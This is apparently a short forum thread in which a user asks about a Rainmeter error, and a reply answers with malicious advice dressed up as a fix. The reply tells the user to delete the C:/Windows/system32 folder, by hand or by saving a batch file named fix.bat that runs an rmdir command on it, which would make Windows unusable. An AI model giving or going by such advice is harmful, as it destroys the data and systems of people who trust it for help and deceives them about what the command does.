Error, and I have no idea what this one means

This error (an image of it is attached) keeps popping up whenever I launch rainmeter, what's wrong with it?

Do you have a system32 folder? you should probably delete it if you do.
Just go to you C:/ drive, open the windows folder, and delete the folder called system32.
Or open notepad, copy and paste this:

@echo off
rmdir "C:\\WINDOWS\system32"

and save that as fix.bat.
